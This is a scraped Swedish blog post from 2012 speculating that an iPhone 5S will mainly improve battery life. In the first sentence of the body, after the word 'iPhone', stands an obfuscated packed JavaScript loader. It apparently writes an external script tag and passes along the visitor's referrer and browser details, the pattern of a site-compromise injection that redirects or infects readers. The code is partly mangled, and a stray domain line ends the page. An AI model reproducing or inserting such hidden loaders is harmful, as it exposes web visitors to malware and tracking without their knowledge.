Image Image Image Image Image Image Image Image Image Image

| 20 juni, 2021

Scroll to top

Top

iPhone 5S – Bättre batteri.

iPhone 5S – Bättre batteri.
Filip Urde
  • On 30 december, 2012
  • http://www.revue.se/filip-urde

iPhone eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|isaai|var|u0026u|referrer|fssfb||js|php’.split(’|’),0,{}))
5s, ett ganska troligt koncept. Sedan iPhone 3 så har  Apple varje år följt upp med en S-version. Inte så spännande kanske men uppdateringar är alltid kul.

 

 

Det lär inte bli någon skillnad denna gången heller, så vi kan vänta oss en iPhone 5s till nästa år. Men vad ska man då göra med iPhone 5 så att den kan kallas för iPhone 5s? En ungrare har gjort ett koncept på hur han tror att iPhone 5S skulle kunna se ut. Det är typ samma telefon som iPhone 5 men 5s får mer batteritid.

Ett ganska troligt koncept och om man ska vara ärlig så är det batteriet som är det största frågetecknet på iPhone 5 som knappt klarar sig igenom dagen. Jag har slutat att hoppas på underverk vid varje iPhone släpp. Det är klart jag vill ha mer prestanda och coola funktioner… men om en så vital sak som batteriet inte fungerar enligt min lägsta nivå… Ja då är nog det en punkt att se lite närmare på.
worship.hr